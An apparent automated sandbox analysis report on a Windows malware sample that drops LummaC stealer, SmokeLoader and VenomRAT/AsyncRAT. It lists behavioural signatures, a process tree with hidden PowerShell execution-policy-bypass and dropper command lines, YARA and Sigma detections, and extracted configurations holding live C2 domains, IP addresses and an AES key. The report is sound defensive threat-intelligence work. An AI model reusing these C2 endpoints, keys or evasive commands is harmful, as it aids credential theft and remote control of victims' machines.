Edit tour

Windows Analysis Report
7Y18r(14).exe

Overview

General Information

Sample name:	7Y18r(14).exe
Analysis ID:	1480462
MD5:	779806a66cccb6b37a02f6b30f7aecf3
SHA1:	0a16526e664ebcfadb6b958580aa12b3deff8645
SHA256:	f42503b4678644e3475344042dafa742e5f3d2d75a7c16409f10d7bcca17e028
Tags:	exe
Infos:

Detection

LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Check for Windows Defender sandbox

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

System process connects to network (likely due to code injection or exploit)

Yara detected AsyncRAT

Yara detected Bdaejec

Yara detected Go Injector

Yara detected LummaC Stealer

Yara detected SmokeLoader

Yara detected VenomRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Changes memory attributes in foreign processes to executable or writable

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to a pastebin service (likely for C&C)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates a thread in another existing process (thread injection)

Creates autostart registry keys with suspicious names

Deletes itself after installation

Drops VBS files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious ZIP file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file contains section with special chars

PE file has a writeable .text section

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Reads the Security eventlog

Reads the System eventlog

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to detect virtual machines (SLDT)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

7Y18r(14).exe (PID: 7488 cmdline: "C:\Users\user\Desktop\7Y18r(14).exe" MD5: 779806A66CCCB6B37A02F6B30F7AECF3)

IXDaI.exe (PID: 7516 cmdline: C:\Users\user\AppData\Local\Temp\IXDaI.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536 MD5: C31336C1EFC2CCB44B4326EA793040F2)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

F6D9.exe (PID: 2768 cmdline: C:\Users\user\AppData\Local\Temp\F6D9.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 3076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

B552.exe (PID: 4016 cmdline: C:\Users\user\AppData\Local\Temp\B552.exe MD5: D3785ED170CDB1F4784D3DFF3A61DAE0)

BitLockerToGo.exe (PID: 4216 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

753F.exe (PID: 4688 cmdline: C:\Users\user\AppData\Local\Temp\753F.exe MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

753F.exe (PID: 4852 cmdline: "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

powershell.exe (PID: 6872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4844 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

vm.exe (PID: 392 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

lm.exe (PID: 7864 cmdline: "lm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

WerFault.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 628 MD5: C31336C1EFC2CCB44B4326EA793040F2)

wscript.exe (PID: 7068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 2504 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vm.exe (PID: 5776 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 1124 MD5: C31336C1EFC2CCB44B4326EA793040F2)

F6D9.exe (PID: 4908 cmdline: "C:\Users\user\AppData\Local\Temp\F6D9.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ftejced (PID: 1240 cmdline: C:\Users\user\AppData\Roaming\ftejced MD5: 779806A66CCCB6B37A02F6B30F7AECF3)

IXDaI.exe (PID: 7708 cmdline: C:\Users\user\AppData\Local\Temp\IXDaI.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}

Threatname: VenomRAT

{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}

Threatname: AsyncRAT

{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\B552.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002B.00000002.2935972956.0000000004F40000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000026.00000002.2904757056.0000000003870000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c92e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4fe64:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000026.00000003.2731047551.000000000067D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x2ce3:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000026.00000003.2640497026.0000000003118000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x2d83:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000026.00000002.2881701412.0000000000060000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c92e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4fe64:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001F.00000003.2365862383.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000026.00000003.2631693692.0000000003115000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0000002B.00000002.2872562883.0000000000480000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000026.00000003.2729559730.0000000003121000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
0000001B.00000002.2364799277.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: IXDaI.exe PID: 7516	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: IXDaI.exe PID: 7708	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: B552.exe PID: 4016	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 4216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 4216	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: vm.exe PID: 392	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: lm.exe PID: 7864	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: lm.exe PID: 7864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lm.exe PID: 7864	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: vm.exe PID: 5776	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
37.2.vm.exe.4e40000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
37.2.vm.exe.4e40000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda04:$q1: Select * from Win32_CacheMemory 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
43.2.vm.exe.28c0000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
43.2.vm.exe.28c0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda04:$q1: Select * from Win32_CacheMemory 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
37.2.vm.exe.4e40000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
37.2.vm.exe.4e40000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
43.2.vm.exe.28c0000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
43.2.vm.exe.28c0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
27.0.B552.exe.7ff75ee70000.0.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
27.2.B552.exe.7ff75ee70000.6.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\F6D9.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 3968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#6110_8yUscnjrUY

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Sigma detected: Script Interpreter Execution From Suspicious Folder
